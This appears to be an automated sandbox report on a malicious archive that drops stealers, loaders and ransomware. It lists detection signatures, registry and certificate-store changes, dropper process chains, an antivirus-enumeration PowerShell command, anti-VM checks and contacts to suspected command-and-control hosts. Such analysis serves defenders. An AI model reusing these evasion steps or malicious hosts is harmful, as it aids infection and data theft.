Malware Analysis Report

2024-11-13 18:56

Sample ID 240223-wbr3dafc21
Target file_release_4.rar
SHA256 e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Tags
glupteba risepro smokeloader stealc zgrat pub3 backdoor dropper evasion loader rat spyware stealer trojan upx djvu lumma discovery persistence ransomware themida
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral13 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral7 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral11 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral10 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral12 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral14 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral8 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral9 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5

Threat Level: Known bad

The file file_release_4.rar was found to be: Known bad.

Malicious Activity Summary

glupteba risepro smokeloader stealc zgrat pub3 backdoor dropper evasion loader rat spyware stealer trojan upx djvu lumma discovery persistence ransomware themida

Detected Djvu ransomware

ZGRat

Glupteba payload

Detect ZGRat V1

Lumma Stealer

Djvu Ransomware

SmokeLoader

RisePro

Stealc

Glupteba

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Modifies file permissions

Identifies Wine through registry keys

Unexpected DNS network traffic destination

Reads data files stored by FTP clients

Drops startup file

Executes dropped EXE

Checks computer location settings

UPX packed file

Loads dropped DLL

Checks BIOS information in registry

Themida packer

Reads user/profile data of web browsers

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 17:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240220-en

Max time kernel

120s

Max time network

125s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2860 wrote to memory of 2280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

148s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 212 wrote to memory of 2352 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2352 -ip 2352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 185.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

31s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary data omitted) C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe

"C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe"

C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe

"C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe"

C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe

"C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe"

C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe

"C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"

C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe

"C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe"

C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe

"C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe"

C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe

"C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe"

C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe

"C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe"

C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe

"C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe"

C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe

"C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe"

C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp" /SL5="$D0122,4124890,54272,C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"

C:\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Users\Admin\AppData\Local\Temp\38DD.exe

C:\Users\Admin\AppData\Local\Temp\38DD.exe

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 294down-river.sbs udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 triedchicken.net udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 monoblocked.com udp
US 8.8.8.8:53 def.bestsup.su udp
RU 147.45.47.101:80 147.45.47.101 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.67.206:80 294down-river.sbs tcp
US 172.67.171.112:80 def.bestsup.su tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.67.206:443 294down-river.sbs tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.97.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.97.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.91.214:443 triedchicken.net tcp
US 188.114.97.2:443 acenitive.shop tcp
US 188.114.97.2:443 acenitive.shop tcp
US 172.67.154.10:443 cleued.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 87.240.137.164:80 vk.com tcp
